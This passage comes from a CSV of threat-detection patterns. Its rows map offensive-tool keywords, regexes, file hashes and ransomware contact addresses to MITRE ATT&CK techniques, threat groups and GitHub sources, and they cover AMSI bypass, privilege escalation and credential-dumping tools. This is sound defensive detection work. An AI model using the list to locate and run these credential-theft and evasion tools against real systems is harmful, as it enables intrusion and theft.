AMSI through the Windows process debugger mechanism.","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/MzHmO/DebugAmsi","1","1","N/A","N/A","10","1","97","22","2023-09-18T17:17:26Z","2023-08-28T07:32:54Z","40543" "*DebugAmsi.sln*",".{0,1000}DebugAmsi\.sln.{0,1000}","offensive_tool_keyword","DebugAmsi","DebugAmsi is another way to bypass AMSI through the Windows process debugger mechanism.","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/MzHmO/DebugAmsi","1","1","N/A","N/A","10","1","97","22","2023-09-18T17:17:26Z","2023-08-28T07:32:54Z","40544" "*DebugAmsi.vcxproj*",".{0,1000}DebugAmsi\.vcxproj.{0,1000}","offensive_tool_keyword","DebugAmsi","DebugAmsi is another way to bypass AMSI through the Windows process debugger mechanism.","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/MzHmO/DebugAmsi","1","1","N/A","N/A","10","1","97","22","2023-09-18T17:17:26Z","2023-08-28T07:32:54Z","40545" 
"*DebugAmsi-main*",".{0,1000}DebugAmsi\-main.{0,1000}","offensive_tool_keyword","DebugAmsi","DebugAmsi is another way to bypass AMSI through the Windows process debugger mechanism.","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/MzHmO/DebugAmsi","1","1","N/A","N/A","10","1","97","22","2023-09-18T17:17:26Z","2023-08-28T07:32:54Z","40546" "*DebugAmsix64.exe*",".{0,1000}DebugAmsix64\.exe.{0,1000}","offensive_tool_keyword","DebugAmsi","DebugAmsi is another way to bypass AMSI through the Windows process debugger mechanism.","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/MzHmO/DebugAmsi","1","1","N/A","N/A","10","1","97","22","2023-09-18T17:17:26Z","2023-08-28T07:32:54Z","40547" "*DebugAmsix86.exe*",".{0,1000}DebugAmsix86\.exe.{0,1000}","offensive_tool_keyword","DebugAmsi","DebugAmsi is another way to bypass AMSI through the Windows process debugger mechanism.","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/MzHmO/DebugAmsi","1","1","N/A","N/A","10","1","97","22","2023-09-18T17:17:26Z","2023-08-28T07:32:54Z","40548" "*DebugInjectionVariant.exe*",".{0,1000}DebugInjectionVariant\.exe.{0,1000}","offensive_tool_keyword","PrivFu","get SYSTEM integrity level by abusing arbitrary kernel write vulnerability and token privileges","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","1","N/A","KernelWritePoCs","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","40550" "*DEBUG-preobfuscation.vba*",".{0,1000}DEBUG\-preobfuscation\.vba.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","40551" 
"*DebugUpdateProcVariant.exe*",".{0,1000}DebugUpdateProcVariant\.exe.{0,1000}","offensive_tool_keyword","PrivFu","get SYSTEM integrity level by abusing arbitrary kernel write vulnerability and token privileges","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","1","N/A","KernelWritePoCs","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","40552" "*Dec0ne/KrbRelayUp*",".{0,1000}Dec0ne\/KrbRelayUp.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","Dispossessor - Black Basta","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","1","N/A","N/A","10","10","1580","209","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z","40553" "*Dec0ne/ShadowSpray*",".{0,1000}Dec0ne\/ShadowSpray.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1556.005 - T1098.001 - T1098","TA0006 - TA0008 - TA0004","N/A","Black Basta","Credential Access","https://github.com/Dec0ne/ShadowSpray","1","1","N/A","N/A","10","5","459","80","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z","40554" "*dec2d084da34a9d29f17ccbd9b7a3820e3c7e9bd903049054f3f115f33cf5f5e*",".{0,1000}dec2d084da34a9d29f17ccbd9b7a3820e3c7e9bd903049054f3f115f33cf5f5e.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","40555" 
"*dec37f1ac505d447bb5d7b4c2bb61d438097b13c28263ffb4209ce41884784b6*",".{0,1000}dec37f1ac505d447bb5d7b4c2bb61d438097b13c28263ffb4209ce41884784b6.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","40556" "*dec494b5bf9db4a84423b921a2137eafc02f4a9839db0e7b0e6900826766ed92*",".{0,1000}dec494b5bf9db4a84423b921a2137eafc02f4a9839db0e7b0e6900826766ed92.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","40557" "*dec6b9f665b6679c1c9bedbd9d51ea9faf76f29619b7cc4892f22b9659719335*",".{0,1000}dec6b9f665b6679c1c9bedbd9d51ea9faf76f29619b7cc4892f22b9659719335.{0,1000}","offensive_tool_keyword","DNSExfiltrator","DNSExfiltrator allows for transferring (exfiltrate) a file over a DNS request covert channel. 
This is basically a data leak testing tool allowing to exfiltrate data over a covert channel.","T1041 - T1048","TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/Arno0x/DNSExfiltrator","1","0","#filehash","N/A","10","9","867","188","2024-04-29T20:20:43Z","2017-12-20T13:58:09Z","40560" "*dec809566b81f6e41ea9fd5643c852371555e7477e406b2d7052317313d1b3e2*",".{0,1000}dec809566b81f6e41ea9fd5643c852371555e7477e406b2d7052317313d1b3e2.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","40561" "*dec9c3346c770a93bd7f1fb1b891100d806ecc70f1c5da84ea001aa0efb3694d*",".{0,1000}dec9c3346c770a93bd7f1fb1b891100d806ecc70f1c5da84ea001aa0efb3694d.{0,1000}","offensive_tool_keyword","FruityC2","FruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","#filehash","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","40562" "*dece45d516d8421e39684618e0b571f94d31dfaf0d0d20d6f4593f4ab67edb0b*",".{0,1000}dece45d516d8421e39684618e0b571f94d31dfaf0d0d20d6f4593f4ab67edb0b.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","#filehash","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","40563" 
"*deced84e656eb8ae4d4c57dfea5d0a74b558f5975621a9ae0d25d59d3c550f4f*",".{0,1000}deced84e656eb8ae4d4c57dfea5d0a74b558f5975621a9ae0d25d59d3c550f4f.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","40564" "*Decfile@cyberfear.com*",".{0,1000}Decfile\@cyberfear\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","40565" "*DecFile@tutanota.com*",".{0,1000}DecFile\@tutanota\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","40566" "*decipher_mremoteng.jar*",".{0,1000}decipher_mremoteng\.jar.{0,1000}","offensive_tool_keyword","mRemoteNG-Decrypt","Python script to decrypt passwords stored by mRemoteNG","T1555.003 - T1110.003 - T1003 - T1081","TA0006 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/kmahyyg/mremoteng-decrypt","1","1","N/A","N/A","8","1","83","21","2022-10-29T16:02:26Z","2019-05-11T09:09:49Z","40567" "*deckard@tyrellcorporation.io*",".{0,1000}deckard\@tyrellcorporation\.io.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/dafthack/GraphRunner","1","0","#email","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","40568" "*decoded_lsass.dmp*",".{0,1000}decoded_lsass\.dmp.{0,1000}","offensive_tool_keyword","Lsassx","Dumping LSASS Evaded Endpoint Security Solutions","T1003.001 - T1055.001 - T1203 - T1027 - T1070.004 - T1140 - T1564.001","TA0006 - TA0005 - TA0004","N/A","N/A","Credential Access","https://github.com/yehia-mamdouh/Lsassx","1","0","N/A","N/A","10","1","12","3","2025-02-15T16:41:38Z","2025-02-15T16:36:27Z","40569" "*DecodeRDPCache.ps1*",".{0,1000}DecodeRDPCache\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","40570" "*decoder-it/ADCSCoercePotato*",".{0,1000}decoder\-it\/ADCSCoercePotato.{0,1000}","offensive_tool_keyword","ADCSCoercePotato","coercing machine authentication but specific for ADCS server","T1187","TA0006","N/A","N/A","Credential Access","https://github.com/decoder-it/ADCSCoercePotato","1","1","N/A","N/A","10","3","224","31","2024-05-05T14:42:23Z","2024-02-26T12:08:34Z","40571" "*decoder-it/KrbRelay-SMBServer*",".{0,1000}decoder\-it\/KrbRelay\-SMBServer.{0,1000}","offensive_tool_keyword","KrbRelay-SMBServer","acts as an SMB server (instead of DCOM) to relay Kerberos AP-REQ to CIFS or HTTP","T1557 - T1021 - T1205 - T1071","TA0006 - TA0008 - TA0010","N/A","Black Basta","Lateral 
Movement","https://github.com/decoder-it/KrbRelay-SMBServer","1","1","N/A","N/A","9","3","215","26","2024-10-08T14:55:59Z","2024-10-05T12:28:55Z","40572" "*decoder-it/LocalPotato*",".{0,1000}decoder\-it\/LocalPotato.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","1","N/A","N/A","10","7","691","92","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z","40573" "*decoder-it/psgetsystem*",".{0,1000}decoder\-it\/psgetsystem.{0,1000}","offensive_tool_keyword","psgetsystem","getsystem via parent process using ps1 & embedded C#","T1134 - T1548","TA0004","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/psgetsystem","1","1","N/A","N/A","10","5","406","88","2023-10-26T07:13:08Z","2018-02-02T11:28:22Z","40574" "*decoder-it/TokenStealer*",".{0,1000}decoder\-it\/TokenStealer.{0,1000}","offensive_tool_keyword","TokenStealer","stealing Windows tokens","T1134 - T1055","TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/decoder-it/TokenStealer","1","1","N/A","N/A","10","2","164","29","2023-10-25T14:08:57Z","2023-10-24T13:06:37Z","40575" "*Decode-RoutingPacket*",".{0,1000}Decode\-RoutingPacket.{0,1000}","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1058","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","40576" "*decoy_document.xls*",".{0,1000}decoy_document\.xls.{0,1000}","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. 
Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tool","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","N/A","6","520","79","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z","40577" "*decrypt.py .\*.txt utf-16-le*",".{0,1000}decrypt\.py\s\.\\.{0,1000}\.txt\sutf\-16\-le.{0,1000}","offensive_tool_keyword","adconnectdump","Dump Azure AD Connect credentials for Azure AD and Active Directory","T1003.004 - T1059.001 - T1082","TA0006 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/fox-it/adconnectdump","1","0","N/A","N/A","10","7","668","88","2024-11-10T22:00:16Z","2019-04-09T07:41:42Z","40578" "*decrypt_chrome_password(*",".{0,1000}decrypt_chrome_password\(.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","0","N/A","N/A","10","5","455","58","2025-04-09T08:17:14Z","2022-05-24T11:05:21Z","40579" "*decrypt_chrome_password.py*",".{0,1000}decrypt_chrome_password\.py.{0,1000}","offensive_tool_keyword","decrypt-chrome-passwords","A simple program to decrypt chrome password saved on your machine.","T1555.003 - T1112 - T1056.001","TA0006 - TA0009 - TA0040","N/A","N/A","Credential Access","https://github.com/ohyicong/decrypt-chrome-passwords","1","1","N/A","N/A","10","10","966","211","2024-07-31T14:08:55Z","2020-12-28T15:11:12Z","40580" "*decrypt_chrome_v20_cookie.py*",".{0,1000}decrypt_chrome_v20_cookie\.py.{0,1000}","offensive_tool_keyword","SharpWeb","SharpWeb - to export browser data including passwords - history - cookies - bookmarks and download records","T1555.003 - T1539 - T1602 - T1074.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential 
Access","https://github.com/StarfireLab/SharpWeb","1","1","N/A","N/A","10","8","703","79","2024-11-15T07:05:34Z","2023-10-09T06:48:23Z","40581" "*decrypt-chrome-passwords-main*",".{0,1000}decrypt\-chrome\-passwords\-main.{0,1000}","offensive_tool_keyword","decrypt-chrome-passwords","A simple program to decrypt chrome password saved on your machine.","T1555.003 - T1112 - T1056.001","TA0006 - TA0009 - TA0040","N/A","N/A","Credential Access","https://github.com/ohyicong/decrypt-chrome-passwords","1","1","N/A","N/A","10","10","966","211","2024-07-31T14:08:55Z","2020-12-28T15:11:12Z","40582" "*Decrypting DPAPI data with masterkey *",".{0,1000}Decrypting\sDPAPI\sdata\swith\smasterkey\s.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","N/A","10","1110","130","2025-03-24T10:23:58Z","2021-09-27T09:12:51Z","40583" "*DecryptNextCharacterWinSCP*",".{0,1000}DecryptNextCharacterWinSCP.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#content","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","40584" "*DecryptNextCharacterWinSCP*",".{0,1000}DecryptNextCharacterWinSCP.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","40585" "*Decrypt-RDCMan -FilePath*",".{0,1000}Decrypt\-RDCMan\s\-FilePath.{0,1000}","offensive_tool_keyword","Decrypt-RDCMan","decrypts passwords stored in Remote Desktop Connection Manager (RDCMan) using DPAPI","T1555.005 - T1145 - T1003","TA0006 - TA0009 - TA0010","N/A","N/A","Credential 
Access","https://github.com/vmamuaya/Powershell/blob/master/Decrypt-RDCMan.ps1","1","0","N/A","N/A","9","1","1","1","2016-12-01T14:06:24Z","2017-11-22T23:18:39Z","40586" "*Decrypt-RDCMan.ps1*",".{0,1000}Decrypt\-RDCMan\.ps1.{0,1000}","offensive_tool_keyword","DecryptRDCManager","decrypts passwords stored in Remote Desktop Connection Manager (RDCMan) using DPAPI","T1003 - T1552 - T1081 - T1027","TA0006 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/mez-0/DecryptRDCManager","1","1","N/A","N/A","8","1","73","7","2020-09-29T10:12:58Z","2020-09-29T08:53:46Z","40587" "*DecryptRDCManager.exe*",".{0,1000}DecryptRDCManager\.exe.{0,1000}","offensive_tool_keyword","DecryptRDCManager","decrypts passwords stored in Remote Desktop Connection Manager (RDCMan) using DPAPI","T1003 - T1552 - T1081 - T1027","TA0006 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/mez-0/DecryptRDCManager","1","1","N/A","N/A","8","1","73","7","2020-09-29T10:12:58Z","2020-09-29T08:53:46Z","40588" "*decryptteamviewer*",".{0,1000}decryptteamviewer.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","40589" "*DecryptTeamViewer: Pillaging registry for TeamViewer information*",".{0,1000}DecryptTeamViewer\:\sPillaging\sregistry\sfor\sTeamViewer\sinformation.{0,1000}","offensive_tool_keyword","DecryptTeamViewer","Enumerate and decrypt TeamViewer credentials from Windows registry","T1552.001 - T1003 - T1119 - T1012","TA0006 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/V1V1/DecryptTeamViewer","1","0","#content","N/A","7","3","241","62","2021-12-05T09:19:56Z","2020-02-07T07:50:47Z","40590" 
"*DecryptTeamViewer-master.zip*",".{0,1000}DecryptTeamViewer\-master\.zip.{0,1000}","offensive_tool_keyword","DecryptTeamViewer","Enumerate and decrypt TeamViewer credentials from Windows registry","T1552.001 - T1003 - T1119 - T1012","TA0006 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/V1V1/DecryptTeamViewer","1","1","N/A","N/A","7","3","241","62","2021-12-05T09:19:56Z","2020-02-07T07:50:47Z","40591" "*decrypttozxybarc.dconnect.eu*",".{0,1000}decrypttozxybarc\.dconnect\.eu.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","40592" "*decrypttozxybarc.onion*",".{0,1000}decrypttozxybarc\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","40593" "*decrypttozxybarc.onion.cab*",".{0,1000}decrypttozxybarc\.onion\.cab.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","40594" "*decrypttozxybarc.onion.link*",".{0,1000}decrypttozxybarc\.onion\.link.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","40595" 
"*decrypttozxybarc.onion.to*",".{0,1000}decrypttozxybarc\.onion\.to.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","40596" "*decrypttozxybarc.tor2web.org*",".{0,1000}decrypttozxybarc\.tor2web\.org.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","40597" "*DecryptWinSCPPassword*",".{0,1000}DecryptWinSCPPassword.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#content","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","40598" "*DecryptWinSCPPassword*",".{0,1000}DecryptWinSCPPassword.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - 